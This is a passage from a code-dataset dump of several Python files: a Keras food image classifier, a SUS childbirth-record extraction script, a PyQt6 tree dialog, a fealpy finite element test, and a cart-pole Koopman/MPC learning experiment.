='categorical_crossentropy',\r\n\t\t\t\t\toptimizer ='rmsprop',\r\n\t\t\t\tmetrics =['accuracy'])\r\n# train & test dataset\r\ntrain_data = ImageDataGenerator(\r\n\t\t\t\trescale = 1. / 255,\r\n\t\t\t\tshear_range = 0.2,\r\n\t\t\t\tzoom_range = 0.2,\r\n\t\t\thorizontal_flip = True)\r\n
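\r\n# flow_from_directory infers class labels from subfolder names, so the data folders are expected\r\n# to be laid out roughly as follows (one subfolder per class; the actual class names are not\r\n# listed in this file, so the names below are illustrative):\r\n#   treaning/<class_name>/*.jpg\r\n#   test/<class_name>/*.jpg\r\n# num_classes=3, so three such subfolders are expected in each directory.\r\n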
\r\ntest_data = ImageDataGenerator(rescale = 1. / 255)\r\n\r\ntrain_generator = train_data.flow_from_directory(train_data_dir,\r\n\t\t\t\t\t\t\ttarget_size =(img_width, img_height),\r\n\t\t\t\t\tbatch_size = batch_size, class_mode ='categorical')\r\n\r\nvalidation_generator = test_data.flow_from_directory(\r\n\t\t\t\t\t\t\t\t\tvalidation_data_dir,\r\n\t\t\t\ttarget_size =(img_width, img_height),\r\n\t\tbatch_size = batch_size, class_mode ='categorical')\r\ntrain_generator.filenames\r\nclassify.fit_generator(train_generator,\r\n\tsteps_per_epoch = num_of_train_samples // batch_size,\r\n\tepochs = epochs, validation_data = validation_generator,\r\n\tvalidation_steps = num_of_test_samples // batch_size)\r\n\r\nclassify.save('model.h5')\r\nclassify.save_weights('model_weighte.h5')\r\n\r\n\r\n","repo_name":"anasAloklah/food-classification-v0","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"75045527788","text":"'''\n    Childbirth (delivery) production.\n\n    Some fields:\n    N_AIH: AIH number, the database ID\n    GESTAO: 1 municipal, 2 state\n    MUNIC_RES: municipality of residence\n    MUNIC_MOV: municipality of hospitalization\n    PROC_REA: procedure performed\n    ANO_CMPT\n    MES_CMPT\n    NASC\n    SEXO\n    DT_INTER\n    DT_SAIDA\n    IDADE\n    MORTE\n    CNES\n    RACA_COR\n    MARCA_UTI: type of ICU\n    MARCA_UCI: type of intermediate care unit\n'''\n\nimport os\nimport pathlib\nimport pandas as pd\nfrom pysus.online_data.SIH import download\nfrom pyarrow.lib import ArrowInvalid\n\nSTATES = 'pe'\nYEAR = 2021\nMONTHS = list(range(1, 13))\nDATA_DIR = pathlib.Path(os.getcwd(), 'datasets', '.pysus')\nPROCED_ID = {\n    '0310010039': ['Normal', 'PARTO NORMAL'],\n    '0310010055': ['Normal', 'PARTO NORMAL EM CENTRO DE PARTO NORMAL (CPN)'],\n    '0411010034': ['Cesário', 'PARTO CESARIANO'],\n    '0411010042': ['Cesário', 'PARTO CESARIANO C/ LAQUEADURA TUBARIA'],\n    '0310010047': ['De Risco', 'PARTO NORMAL EM GESTACAO DE ALTO RISCO'],\n    '0411010026': ['De Risco', 'PARTO CESARIANO EM GESTACAO ALTO RISCO']\n}\n\nos.environ['PYSUS_CACHEPATH'] = str(DATA_DIR)\n\ndef extract_files(states, year, months, data_dir):\n    files = [download(states, year, m, data_dir) for m in months]\n    return files\n\ndef _queries_concat(queries):\n    q = [\n        f\"{k} == {v if type(v) == list else [str(v)]}\"\n        for k, v in queries.items()\n    ]\n\n    query = ' & '.join(q)\n    return query\n\ndef create_dataframe(data_dir, **kwargs):\n\n    files = os.listdir(data_dir)\n    try:\n        df = pd.concat(\n            [pd.read_parquet(f'{DATA_DIR}/{file}') for file in files]\n        )\n    except ArrowInvalid:\n        err = 'Could not build the dataframe. '\\\n              'Have the files been downloaded?'\n        return print(err)\n\n    query = _queries_concat(kwargs)\n\n    if query:\n        return df.query(query)\n    return df\n\n\nif __name__ == '__main__':\n    cols_sel = [\n        'GESTAO',\n        'MUNIC_RES',\n        'MUNIC_MOV',\n        'PROC_REA',\n        'ANO_CMPT',\n        'MES_CMPT',\n        'NASC',\n        'SEXO',\n        'DT_INTER',\n        'DT_SAIDA',\n        'IDADE',\n        'MORTE',\n        'CNES',\n        'RACA_COR',\n        'MARCA_UTI',\n        'MARCA_UCI'\n    ]\n\n    int_cols = [\n        'MUNIC_RES',\n        'MUNIC_MOV',\n        'ANO_CMPT',\n        'MES_CMPT',\n        'IDADE',\n        'RACA_COR',\n        'SEXO',\n        'GESTAO'\n    ]\n\n    proced = list(PROCED_ID.keys())\n    df = create_dataframe(DATA_DIR, PROC_REA=proced)\n    df.set_index('N_AIH', inplace=True)\n    df_partos = df[cols_sel]\n    df_partos[int_cols] = df_partos[int_cols].astype('int32')\n\n    df_geres = 
pd.read_parquet('datasets/localidade_pe.parquet.gzip')\n","repo_name":"bernarducs/sus_extracoes","sub_path":"partos/producao.py","file_name":"producao.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420432111","text":"from PyQt6.QtWidgets import QDialog, QHBoxLayout, QVBoxLayout, QPushButton, QTreeWidget, QTreeWidgetItem\n\nclass SelectFromEntityChild(QDialog):\n def __init__(self, entity):\n super().__init__()\n\n self._entity = entity\n self._selectedEntity = None\n\n self._rootLayout = QVBoxLayout()\n self._tree = QTreeWidget()\n self._tree.setHeaderHidden(True)\n self._tree.setColumnCount(1)\n self._tree.setSortingEnabled(False)\n self._tree.currentItemChanged.connect(self._signal_tree_currentItemChanged)\n self._buildTree(self._entity, self._tree.invisibleRootItem())\n self._rootLayout.addWidget(self._tree)\n\n self._buttotLayout = QHBoxLayout()\n\n self._cancelBt = QPushButton(\"Cancel\")\n self._cancelBt.clicked.connect(self._signal_cancelBt_clicked)\n self._buttotLayout.addWidget(self._cancelBt)\n\n self._selectBt = QPushButton(\"Select\")\n self._selectBt.clicked.connect(self._signal_selectBt_clicked)\n self._selectBt.setEnabled(False)\n self._buttotLayout.addWidget(self._selectBt)\n\n self._rootLayout.addLayout(self._buttotLayout)\n\n self.setLayout(self._rootLayout)\n self.setWindowTitle(\"Select Entity\")\n\n def _signal_cancelBt_clicked(self):\n self._selectedEntity = None\n self.done(0)\n\n def _signal_selectBt_clicked(self):\n self.done(0)\n\n def _buildTree(self, rootEntity, rootItem):\n item = QTreeWidgetItem(rootItem)\n if rootEntity == self._entity:\n item.setText(0, \"{0} (this)\".format(rootEntity.getName()))\n else:\n if rootEntity.isInternal():\n item.setText(0, rootEntity.getName())\n else:\n item.setText(0, \"{0} {1}\".format(rootEntity.getName(), rootEntity.getNameSuffix()))\n item._entity = rootEntity\n for childEnt in rootEntity.getChildren():\n self._buildTree(childEnt, item)\n\n def _signal_tree_currentItemChanged(self, currItem, prevItem):\n if currItem is not None:\n self._selectedEntity = currItem._entity\n self._selectBt.setEnabled(True)\n else:\n self._selectedEntity = None\n self._selectBt.setEnabled(False)\n\n def getSelectedEntity(self):\n return self._selectedEntity\n\n def reject(self):\n self._selectedEntity = None\n super().reject()","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/App/dialog/SelectFromEntityChild.py","file_name":"SelectFromEntityChild.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"40709519314","text":"#!/usr/bin/env python3\n# \nimport numpy as np\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\n\nfrom fealpy.functionspace import SurfaceLagrangeFiniteElementSpace\nfrom fealpy.pde.surface_poisson_model_3d import HeartSurfacetData\n\n\nclass SurfaceLagrangeFiniteElementSpaceTest:\n def __init__(self):\n pass\n\n def mesh_scale_test(self, plot=True):\n scale = 10\n pde = HeartSurfacetData()\n surface = pde.domain()\n mesh = pde.init_mesh()\n space = SurfaceLagrangeFiniteElementSpace(mesh, surface, p=1, scale=scale)\n mesh = space.mesh\n if plot is True:\n fig = plt.figure()\n axes = Axes3D(fig)\n mesh.add_plot(axes, showaxis=True)\n plt.show()\n\n def grad_recovery_test(self, p=1, plot=False):\n from fealpy.pde.surface_poisson_model_3d import SphereSinSinSinData \n pde = 
SphereSinSinSinData()\n surface = pde.domain()\n mesh = pde.init_mesh()\n for i in range(4):\n space = SurfaceLagrangeFiniteElementSpace(mesh, surface, p=p)\n uI = space.interpolation(pde.solution)\n rg = space.grad_recovery(uI)\n error0 = space.integralalg.L2_error(pde.solution, uI.value)\n error1 = space.integralalg.L2_error(pde.gradient, rg.value)\n\n def f(x):\n return np.sum(rg.value(x)**2, axis=-1)\n eta = space.integralalg.integral(f, celltype=True)\n\n mesh.uniform_refine(surface=surface)\n print(error1)\n\n\n\n\ntest = SurfaceLagrangeFiniteElementSpaceTest()\n#test.mesh_scale_test()\ntest.grad_recovery_test()\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/test/SurfaceLagrangeFiniteElementSpaceTest.py","file_name":"SurfaceLagrangeFiniteElementSpaceTest.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"11528162663","text":"#%%\n\"\"\"Cart Pendulum Example\"\"\"\nimport matplotlib\nfrom matplotlib.pyplot import ylim, xlabel, ylabel, fill_between\nimport os\nfrom matplotlib.pyplot import figure, grid, legend, plot, show, subplot, title, savefig, tight_layout\nfrom matplotlib.ticker import MaxNLocator\nfrom numpy import arange, array, concatenate\nfrom numpy import zeros, pi, random, interp, dot, multiply, asarray\nimport numpy as np\nfrom scipy.io import savemat\nfrom ..systems import CartPole\nfrom ..dynamics import LinearSystemDynamics\nfrom ..controllers import PDController, OpenLoopController, MPCController, MPCControllerDense\nfrom ..learning import KoopmanEigenfunctions, RBF, Edmd, Keedmd\nimport time\nimport dill\nimport control\nfrom datetime import datetime\nimport random as rand\nimport scipy.sparse as sparse\n\nclass CartPoleTrajectory(CartPole):\n def __init__(self, robotic_dynamics, q_d, t_d):\n m_c, m_p, l, g = robotic_dynamics.params\n CartPole.__init__(self, m_c, m_p, l, g)\n self.robotic_dynamics = robotic_dynamics\n self.q_d = q_d\n self.t_d = t_d\n\n def eval(self, q, t):\n return q - self.desired_state(t)\n\n def desired_state(self, t):\n return [interp(t, self.t_d.flatten(),self.q_d[ii,:].flatten()) for ii in range(self.q_d.shape[0])]\n\n def drift(self, q, t):\n return self.robotic_dynamics.drift(q, t)\n\n def act(self, q, t):\n return self.robotic_dynamics.act(q, t)\n\n#%% \n#! 
=============================================== SET PARAMETERS ===============================================\n\n# Define true system\nsystem_true = CartPole(m_c=.5, m_p=.2, l=.4)\nn, m = 4, 1 # Number of states and actuators\nupper_bounds = array([3.0, pi/3, 2, 2]) # Upper State constraints\nlower_bounds = -upper_bounds # Lower State constraints\n\n# Define nominal model and nominal controller:\nA_nom = array([[0., 0., 1., 0.], [0., 0., 0., 1.], [0., -3.924, 0., 0.], [0., 34.335, 0., 0.]]) # Linearization of the true system around the origin\nB_nom = array([[0.],[0.],[2.],[-5.]]) # Linearization of the true system around the origin\nK_p = -array([[7.3394, 39.0028]]) # Proportional control gains\nK_d = -array([[8.0734, 7.4294]]) # Derivative control gains\nnominal_sys = LinearSystemDynamics(A=A_nom, B=B_nom)\n\n# Simulation parameters (data collection)\nNtraj = 40 # Number of trajectories to collect data from\ndt = 1.0e-2 # Time step length\nN = int(2./dt) # Number of time steps\nt_eval = dt * arange(N + 1) # Simulation time points\nnoise_var = 0.5 # Exploration noise to perturb controller\ntraj_bounds = [2.5,0.25,0.05,0.05] # State constraints, [x, theta, x_dot, theta_dot]\nq_d = zeros((Ntraj,N+1,n)) # Desired trajectories (initialization)\nQ = sparse.diags([0,0,0,0]) # MPC state penalty matrix\nQN = sparse.diags([100000.,100000.,10000.,10000.]) # MPC final state penalty matrix\nR = sparse.eye(m) # MPC control penalty matrix\numax = 5 # MPC actuation constraint\nMPC_horizon = 2 # MPC time horizon [sec]\n\n# Koopman eigenfunction parameters\neigenfunction_max_power = 2 # Max power of variables in eigenfunction products\nl2_diffeomorphism = 0.0 # l2 regularization strength\njacobian_penalty_diffeomorphism = 1e1 # Estimator jacobian regularization strength\ndiff_n_epochs = 500 # Number of epochs\ndiff_train_frac = 0.9 # Fraction of data to be used for training\ndiff_n_hidden_layers = 3 # Number of hidden layers\ndiff_layer_width = 50 # Number of units in each layer\ndiff_batch_size = 16 # Batch size\ndiff_learn_rate = 1e-1 # Learning rate\ndiff_learn_rate_decay = 0.99 # Learning rate decay\ndiff_dropout_prob = 0.25 # Dropout rate\n\n# KEEDMD parameters\nl1_pos_keedmd = 0.001979592839755224 # l1 regularization strength for position states\nl1_pos_ratio_keedmd = 0.1 # l1-l2 ratio for position states\nl1_vel_keedmd = 0.024029630466870816 # l1 regularization strength for velocity states\nl1_vel_ratio_keedmd = 1.0 # l1-l2 ratio for velocity states\nl1_eig_keedmd = 6.819171287059534 # l1 regularization strength for eigenfunction states\nl1_eig_ratio_keedmd = 0.1 # l1-l2 ratio for eigenfunction states\n\n# EDMD parameters (benchmark to compare against)\nn_lift_edmd = (eigenfunction_max_power+1)**n-1 # Lifting dimension EDMD (same number as for KEEDMD)\nl1_edmd = 0.00687693796 # l1 regularization strength\nl1_ratio_edmd = 1.00 # l1-l2 ratio\nl1_ratio_vals = array([0.1, 0.5, 0.75, 0.9, 0.95, 0.99, 1.0])\n\n# Open loop evaluation parameters\nNtraj_pred = 40 # Number of trajectories to use to evaluate open loop performance\nnoise_var_pred = 0.5 # Exploration noise to perturb controller\ntraj_bounds_pred = [2, 0.5, 0.1, 0.1] # State constraints, [x, theta, x_dot, theta_dot]\nq_d_pred = zeros((Ntraj_pred, N + 1, n)) # Desired trajectories (initialization)\n\n# Closed loop evaluation parameters\nx_0_mpc = array([2., 0.25, 0., 0.]) # Initial condition\nt_pred_mpc = t_eval.squeeze() # Time steps\nnoise_var_mpc = 0.0 # Exploration noise to perturb controller\nQ_mpc = sparse.diags([5e3, 3e3, 1e2, 1e2]) # MPC 
state penalty matrix\nQN_mpc = Q # MPC final state penalty matrix\nR_mpc = sparse.eye(m) # MPC control penalty matrix\nD_mpc = sparse.diags([500,300,50,60]) # MPC state constraint violation penalty matrix\nupper_bounds_mpc = array([np.Inf, np.Inf, np.Inf, np.Inf]) # MPC state constraints\nlower_bounds_mpc = -upper_bounds_mpc # MPC state constraints\numax_mpc = 5. # MPC actuation constraint\nhorizon_mpc = 0.4 # MPC time horizon\n\n\n\n#%% \n#! =============================================== COLLECT DATA ===============================================\nprint(\"Collect data:\")\nprint(\" - Generate optimal desired path...\",end=\" \")\nt0 = time.process_time()\n\nmpc_controller = MPCController(linear_dynamics=nominal_sys,\n N=int(MPC_horizon/dt),\n dt=dt,\n umin=array([-umax]),\n umax=array([+umax]),\n xmin=lower_bounds,\n xmax=upper_bounds,\n Q=Q,\n R=R,\n QN=QN,\n xr=zeros(n))\nfor ii in range(Ntraj):\n x_0 = asarray([rand.uniform(-i,i) for i in traj_bounds])\n while abs(x_0[0]) < 1.25:\n x_0 = asarray([rand.uniform(-i, i) for i in traj_bounds])\n mpc_controller.eval(x_0,0)\n q_d[ii,:,:] = mpc_controller.parse_result().transpose()\n\nsavemat('./core/examples/cart_pole_d.mat', {'t_d': t_eval, 'q_d': q_d})\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Simulate system from each initial condition\nprint(' - Simulate system with {} trajectories using PD controller...'.format(Ntraj), end =\" \")\nt0 = time.process_time()\noutputs = [CartPoleTrajectory(system_true, q_d[i,:,:].transpose(), t_eval) for i in range(Ntraj)]\npd_controllers = [PDController(outputs[i], K_p, K_d, noise_var) for i in range(Ntraj)]\npd_controllers_nom = [PDController(outputs[i], K_p, K_d, 0.) for i in range(Ntraj)] # Duplicate of controllers with no noise perturbation\nxs, us, us_nom, ts = [], [], [], []\nfor ii in range(Ntraj):\n x_0 = q_d[ii,0,:]\n xs_tmp, us_tmp = system_true.simulate(x_0, pd_controllers[ii], t_eval)\n us_nom_tmp = pd_controllers_nom[ii].eval(xs_tmp.transpose(), t_eval).transpose()\n xs.append(xs_tmp)\n us.append(us_tmp)\n us_nom.append(us_nom_tmp[:us_tmp.shape[0],:])\n ts.append(t_eval)\n\nxs, us, us_nom, ts = array(xs), array(us), array(us_nom), array(ts)\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n#%%\n#! 
=============================================== FIT MODELS ===============================================\n\n# Construct basis of Koopman eigenfunctions for KEEDMD:\nprint('Construct Koopman eigenfunction basis:\\n', end =\"\")\nt0 = time.process_time()\nA_cl = A_nom - dot(B_nom,concatenate((K_p, K_d),axis=1))\nBK = dot(B_nom,concatenate((K_p, K_d),axis=1))\neigenfunction_basis = KoopmanEigenfunctions(n=n, max_power=eigenfunction_max_power, A_cl=A_cl, BK=BK)\neigenfunction_basis.build_diffeomorphism_model(jacobian_penalty=jacobian_penalty_diffeomorphism, n_hidden_layers = diff_n_hidden_layers, layer_width=diff_layer_width, batch_size= diff_batch_size, dropout_prob=diff_dropout_prob)\neigenfunction_basis.fit_diffeomorphism_model(X=xs, t=ts, X_d=q_d, l2=l2_diffeomorphism, learning_rate=diff_learn_rate,\n learning_decay=diff_learn_rate_decay, n_epochs=diff_n_epochs, train_frac=diff_train_frac, batch_size=diff_batch_size)\neigenfunction_basis.construct_basis(ub=upper_bounds, lb=lower_bounds)\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Fit KEEDMD model:\nprint(' - Fitting KEEDMD model...', end =\" \")\nt0 = time.process_time()\nkeedmd_model = Keedmd(eigenfunction_basis, n, l1_pos=l1_pos_keedmd, l1_ratio_pos=l1_pos_ratio_keedmd, l1_vel=l1_vel_keedmd, l1_ratio_vel=l1_vel_ratio_keedmd, l1_eig=l1_eig_keedmd, l1_ratio_eig=l1_eig_ratio_keedmd, K_p=K_p, K_d=K_d)\nX, X_d, Z, Z_dot, U, U_nom, t = keedmd_model.process(xs, q_d, us, us_nom, ts)\n#keedmd_model.fit(X, X_d, Z, Z_dot, U, U_nom)\nkeedmd_model.tune_fit(X, X_d, Z, Z_dot, U, U_nom, l1_ratio=l1_ratio_vals)\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Construct basis of RBFs for EDMD:\nprint(' - Constructing RBF basis...', end =\" \")\nt0 = time.process_time()\n\nrbf_centers = multiply(random.rand(n,n_lift_edmd),(upper_bounds-lower_bounds).reshape((upper_bounds.shape[0],1)))+lower_bounds.reshape((upper_bounds.shape[0],1))\nrbf_basis = RBF(rbf_centers, n, gamma=1.)\nrbf_basis.construct_basis()\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n# Fit EDMD model\nprint(' - Fitting EDMD model...', end =\" \")\nt0 = time.process_time()\nedmd_model = Edmd(rbf_basis, n, l1=l1_edmd, l1_ratio=l1_ratio_edmd)\nX, X_d, Z, Z_dot, U, U_nom, t = edmd_model.process(xs, q_d, us, us_nom, ts)\nedmd_model.fit(X, X_d, Z, Z_dot, U, U_nom)\n#edmd_model.tune_fit(X, X_d, Z, Z_dot, U, U_nom, l1_ratio=l1_ratio_vals)\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\n#%%\n#! 
============================================== EVALUATE PERFORMANCE -- OPEN LOOP =========================================\n\n# Set up trajectory and controller for prediction task:\nprint('Evaluate Performance with open loop prediction...', end =\" \")\nt0 = time.process_time()\nt_pred = t_eval.squeeze()\n\nfor ii in range(Ntraj_pred):\n x_0 = asarray([random.uniform(-i, i) for i in traj_bounds_pred])\n mpc_controller.eval(x_0, 0)\n q_d_pred[ii,:, :] = mpc_controller.parse_result().transpose()\n\nsavemat('./core/examples/cart_pole_pred_d.mat', {'t_d': t_eval, 'q_d_pred': q_d_pred})\n\n# Define KEEDMD and EDMD systems:\nkeedmd_sys = LinearSystemDynamics(A=keedmd_model.A, B=keedmd_model.B)\nedmd_sys = LinearSystemDynamics(A=edmd_model.A, B=edmd_model.B)\n\n#Simulate all different systems\nxs_pred = []\nxs_keedmd = []\nxs_edmd = []\nxs_nom = []\n\nfor ii in range(Ntraj_pred):\n output_pred = CartPoleTrajectory(system_true, q_d_pred[ii,:,:].transpose(),t_pred)\n pd_controller_pred = PDController(output_pred, K_p, K_d, noise_var_pred)\n\n # Simulate true system (baseline):\n x0_pred = q_d_pred[ii,0,:]\n xs_pred_tmp, us_pred_tmp = system_true.simulate(x0_pred, pd_controller_pred, t_pred)\n xs_pred_tmp = xs_pred_tmp.transpose()\n\n # Create systems for each of the learned models and simulate with open loop control signal us_pred:\n keedmd_controller = OpenLoopController(keedmd_sys, us_pred_tmp, t_pred[:us_pred_tmp.shape[0]])\n z0_keedmd = keedmd_model.lift(x0_pred.reshape(x0_pred.shape[0],1), q_d_pred[ii,:1,:].transpose()).squeeze()\n zs_keedmd,_ = keedmd_sys.simulate(z0_keedmd,keedmd_controller,t_pred)\n xs_keedmd_tmp = dot(keedmd_model.C,zs_keedmd.transpose())\n\n edmd_controller = OpenLoopController(edmd_sys, us_pred_tmp, t_pred[:us_pred_tmp.shape[0]])\n z0_edmd = edmd_model.lift(x0_pred.reshape(x0_pred.shape[0],1), q_d_pred[ii,:1,:].transpose()).squeeze()\n zs_edmd,_ = edmd_sys.simulate(z0_edmd,edmd_controller,t_pred)\n xs_edmd_tmp = dot(edmd_model.C,zs_edmd.transpose())\n\n nom_controller = OpenLoopController(nominal_sys, us_pred_tmp, t_pred[:us_pred_tmp.shape[0]])\n xs_nom_tmp,_ = nominal_sys.simulate(x0_pred,nom_controller,t_pred)\n xs_nom_tmp = xs_nom_tmp.transpose()\n\n xs_pred.append(xs_pred_tmp)\n xs_keedmd.append(xs_keedmd_tmp)\n xs_edmd.append(xs_edmd_tmp)\n xs_nom.append(xs_nom_tmp)\n\n# Calculate error statistics\nmse_keedmd = array([(xs_keedmd[ii] - xs_pred[ii])**2 for ii in range(Ntraj_pred)])\nmse_edmd = array([(xs_edmd[ii] - xs_pred[ii])**2 for ii in range(Ntraj_pred)])\nmse_nom = array([(xs_nom[ii] - xs_pred[ii])**2 for ii in range(Ntraj_pred)])\ne_keedmd = array(np.abs([xs_keedmd[ii] - xs_pred[ii] for ii in range(Ntraj_pred)]))\ne_edmd = array(np.abs([xs_edmd[ii] - xs_pred[ii] for ii in range(Ntraj_pred)]))\ne_nom = array(np.abs([xs_nom[ii] - xs_pred[ii] for ii in range(Ntraj_pred)]))\nmse_keedmd = np.mean(np.mean(np.mean(mse_keedmd)))\nmse_edmd = np.mean(np.mean(np.mean(mse_edmd)))\nmse_nom = np.mean(np.mean(np.mean(mse_nom)))\ne_mean_keedmd = np.mean(e_keedmd, axis=0)\ne_mean_edmd = np.mean(e_edmd, axis=0)\ne_mean_nom = np.mean(e_nom, axis=0)\ne_std_keedmd = np.std(e_keedmd, axis=0)\ne_std_edmd = np.std(e_edmd, axis=0)\ne_std_nom = np.std(e_nom, axis=0)\n\n# Save open loop data for analysis and plotting:\nfolder = \"core/examples/results/\" + datetime.now().strftime(\"%m%d%Y_%H%M%S\")\nos.mkdir(folder)\ndata_list = [t_pred, mse_keedmd, mse_edmd, mse_nom, e_keedmd, e_edmd, e_nom, e_mean_keedmd, e_mean_edmd, e_mean_nom, e_std_keedmd, e_std_edmd, e_std_nom, xs_keedmd, 
xs_edmd, xs_nom, xs_pred]\noutfile = open(folder + \"/open_loop.pickle\", 'wb')\ndill.dump(data_list, outfile)\noutfile.close()\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\n\nCmatrix_edmd = control.ctrb(A=edmd_model.A, B=edmd_model.B)\nprint('EDMD controllability matrix rank is {}, ns={}, nz={}'.format(np.linalg.matrix_rank(Cmatrix_edmd),n,edmd_model.A.shape[0]))\nCmatrix_keedmd = control.ctrb(A=keedmd_model.A, B=keedmd_model.B)\nprint('KEEDMD controllability matrix rank is {}, ns={}, nz={}'.format(np.linalg.matrix_rank(Cmatrix_keedmd),n,edmd_model.A.shape[0]))\n\n\n#%% \n#!============================================== EVALUATE PERFORMANCE -- CLOSED LOOP =============================================\nt0 = time.process_time()\nprint('Evaluate Performance with closed loop trajectory tracking...', end=\" \")\n\n# Generate trajectory:\nmpc_controller.eval(x_0_mpc, 0)\nqd_mpc = mpc_controller.parse_result()\n\n# Nominal model MPC:\nprint('\\n - Nominal model')\nnominal_mpc_controller = MPCControllerDense(linear_dynamics=nominal_sys,\n N=int(horizon_mpc/dt),\n dt=dt,\n umin=array([-umax_mpc]),\n umax=array([+umax_mpc]),\n xmin=lower_bounds_mpc,\n xmax=upper_bounds_mpc,\n Q=Q_mpc,\n R=R_mpc,\n QN=QN_mpc,\n xr=qd_mpc,\n plotMPC=False,\n name='Nom')\n\nxs_nom_mpc, us_nom_mpc = system_true.simulate(x_0_mpc, nominal_mpc_controller, t_pred_mpc)\nxs_nom_mpc = xs_nom_mpc.transpose()\nus_nom_mpc = us_nom_mpc.transpose()\n\n# EDMD MPC:\nprint(' - EDMD model')\nedmd_sys = LinearSystemDynamics(A=edmd_model.A, B=edmd_model.B)\nedmd_controller = MPCControllerDense(linear_dynamics=edmd_sys,\n N=int(horizon_mpc/dt),\n dt=dt,\n umin=array([-umax_mpc]),\n umax=array([+umax_mpc]),\n xmin=lower_bounds_mpc,\n xmax=upper_bounds_mpc,\n Q=Q_mpc,\n R=R_mpc,\n QN=QN_mpc,\n xr=qd_mpc,\n lifting=True,\n edmd_object=edmd_model,\n plotMPC=False,\n soft=True,\n D=D_mpc,\n name='EDMD')\n\nxs_edmd_mpc, us_emdm_mpc = system_true.simulate(x_0_mpc, edmd_controller, t_pred_mpc)\nxs_edmd_mpc = xs_edmd_mpc.transpose()\nus_edmd_mpc = us_emdm_mpc.transpose()\n\n#KEEDMD MPC:\nprint(' - KEEDMD model')\nkeedmd_sys = LinearSystemDynamics(A=keedmd_model.A, B=keedmd_model.B)\nkeedmd_controller = MPCControllerDense(linear_dynamics=keedmd_sys,\n N=int(horizon_mpc/dt),\n dt=dt,\n umin=array([-umax_mpc]),\n umax=array([+umax_mpc]),\n xmin=lower_bounds_mpc,\n xmax=upper_bounds_mpc,\n Q=Q_mpc,\n R=R_mpc,\n QN=QN_mpc,\n xr=qd_mpc,\n lifting=True,\n edmd_object=keedmd_model,\n plotMPC=False,\n soft=True,\n D=D_mpc,\n name='KEEDMD')\n\nxs_keedmd_mpc, us_keemdm_mpc = system_true.simulate(x_0_mpc, keedmd_controller, t_pred_mpc)\nxs_keedmd_mpc = xs_keedmd_mpc.transpose()\nus_keedmd_mpc = us_keemdm_mpc.transpose()\n\nprint('in {:.2f}s'.format(time.process_time()-t0))\nt0 = time.process_time()\n\n# Calculate statistics for the different models\nmse_mpc_nom = sum(sum((xs_nom_mpc-qd_mpc)**2))/xs_nom_mpc.size\nmse_mpc_edmd = sum(sum((xs_edmd_mpc-qd_mpc)**2))/xs_edmd_mpc.size\nmse_mpc_keedmd = sum(sum((xs_keedmd_mpc-qd_mpc)**2))/xs_keedmd_mpc.size\nE_nom = np.linalg.norm(us_nom_mpc)\nE_edmd = np.linalg.norm(us_edmd_mpc)\nE_keedmd = np.linalg.norm(us_keedmd_mpc)\n\nQ_d = Q_mpc.todense()\nR_d = R_mpc.todense()\ncost_nom = sum(np.diag(np.dot(np.dot((xs_nom_mpc-qd_mpc).T,Q_d), xs_nom_mpc-qd_mpc))) + sum(np.diag(np.dot(np.dot(us_nom_mpc.T,R_d),us_nom_mpc)))\ncost_edmd = sum(np.diag(np.dot(np.dot((xs_edmd_mpc-qd_mpc).T,Q_d), xs_edmd_mpc-qd_mpc))) + sum(np.diag(np.dot(np.dot(us_edmd_mpc.T,R_d),us_edmd_mpc)))\ncost_keedmd = 
sum(np.diag(np.dot(np.dot((xs_keedmd_mpc-qd_mpc).T,Q_d), xs_keedmd_mpc-qd_mpc))) + sum(np.diag(np.dot(np.dot(us_keedmd_mpc.T,R_d),us_keedmd_mpc)))\nprint('Tracking error (MSE), Nominal: ', mse_mpc_nom, ', EDMD: ', mse_mpc_edmd, 'KEEDMD: ', mse_mpc_keedmd)\nprint('Control effort (norm), Nominal: ', E_nom, ', EDMD: ', E_edmd, ', KEEDMD: ', E_keedmd)\nprint('MPC cost, Nominal: ', cost_nom, ', EDMD: ', cost_edmd, ', KEEDMD: ', cost_keedmd)\nprint('MPC cost improvement, EDMD: ', (cost_edmd/cost_nom-1)*100, '%, KEEDMD: ', (cost_keedmd/cost_nom-1)*100, '%')\n\n# Save closed loop data for analysis and plotting:\ndata_list = [t_pred_mpc, qd_mpc, xs_nom_mpc, xs_edmd_mpc, xs_keedmd_mpc, us_nom_mpc, us_edmd_mpc, us_keedmd_mpc, mse_mpc_nom, mse_mpc_edmd, mse_mpc_keedmd, E_nom, E_edmd, E_keedmd, cost_nom, cost_edmd, cost_keedmd]\noutfile = open(folder + \"/closed_loop.pickle\", 'wb')\ndill.dump(data_list, outfile)\noutfile.close()\n\n#%%\n#!======================================== PLOT OPEN AND CLOSED LOOP RESULTS FOR PAPER =========================================\n\n# Plot errors of different models and statistics, open loop\nylabels = ['$e_x$', '$e_{\\\\theta}$']\nax = figure(figsize=(6,5)).gca()\nfor ii in range(2):\n subplot(2, 1, ii+1)\n plot(t_pred, e_mean_nom[ii,:], linewidth=2, label='Nominal', color='tab:gray')\n fill_between(t_pred, e_mean_nom[ii,:]-e_std_nom[ii,:], e_mean_nom[ii,:]+e_std_nom[ii,:], alpha=0.2, color='tab:gray')\n\n plot(t_pred, e_mean_edmd[ii,:], linewidth=2, label='EDMD', color='tab:green')\n fill_between(t_pred, e_mean_edmd[ii,:] - e_std_edmd[ii, :], e_mean_edmd[ii,:] + e_std_edmd[ii, :], alpha=0.2, color='tab:green')\n\n plot(t_pred, 